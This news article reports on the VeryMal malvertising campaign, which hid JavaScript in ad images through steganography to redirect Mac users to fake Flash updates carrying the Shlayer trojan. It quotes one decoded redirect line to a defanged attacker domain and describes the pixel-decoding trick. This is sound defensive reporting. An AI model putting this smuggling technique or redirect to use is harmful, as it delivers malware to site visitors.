Malvertisers target Mac users with steganographic code stashed in images

One of the malicious ads displayed in a campaign from VeryMal.

Enlarge / One of the malicious ads displayed in a campaign from VeryMal.

Researchers have uncovered a recent malicious advertisement campaign that’s notable for its size, scope, and resourcefulness: a two-day blitz triggered as many as 5 million times per day that used highly camouflaged JavaScript stashed in images to install a trojan on visitors’ Macs.

The ads were served by a group security firm Confiant has dubbed VeryMal, a name that comes from veryield-malyst.com, one of the ad-serving domains the group uses. A run that was active from January 11 to January 13 on about 25 of the top 100 publisher sites triggered the image as many as 5 million times a day. In an attempt to bypass increasingly effective measures available to detect malicious ads, the images used steganography—the ancient practice of hiding code, messages, or other data inside images or text—to deliver its malicious payload to Mac-using visitors.

In a blog post published Wednesday, Confiant researcher Eliya Stein wrote:

As malvertising detection continues to mature, sophisticated attackers are starting to learn that obvious methods of obfuscation are no longer getting the job done. The output of common JavaScript obfuscators is a very particular type of gibberish that can easily be recognized by the naked eye. Techniques like steganography are useful for smuggling payloads without relying on hex encoded strings or bulky lookup tables.

The image, which is displayed to the right of this text, looked unremarkable. Using some clever HTML5 programming under the hood, however, it delivered malicious code to unsuspecting Mac users. VeryMal created a canvas object, which developers use to render or enhance graphics. If the computer had Mac-specific fonts installed, the object would then loop through the underlying data in the image file and convert an individual pixel in each loop into an alphanumeric character. After adding each newly extracted character to a text string, it looked like this:

top.location.href =’hxxp://veryield-malyst.com/’ + volton + ‘?var1=’ + wsw;

With that, the malvertisers had snuck the code they needed to redirect Mac users to a website that served display ads that falsely claimed the visitor’s Flash Player was out of date. Visitors who took the bait were then infected with Shlayer, a Mac trojan that came to light 11 months ago and is used to install adware.

This month’s campaign is by no means the first time VeryMal has struck. A similar campaign in December targeted Macs and iOS devices. Wednesday’s post said the group also targeted Windows-based users, but there’s no mention the ads used similar stenographic techniques.

Wednesday’s post demonstrates how malvertisers continue to improve their techniques for slipping malicious content past advertisers who spend time and money to detect bad ads. Fortunately—for the moment, at least—most malicious ads seem to work by tricking visitors into clicking on OK buttons that will install malware. People who want to protect themselves should remain suspicious of any warning that displays while a Web advertisement is loaded. They should also ensure browsers and OSes are current and download updates only from official sources.

Similar Posts: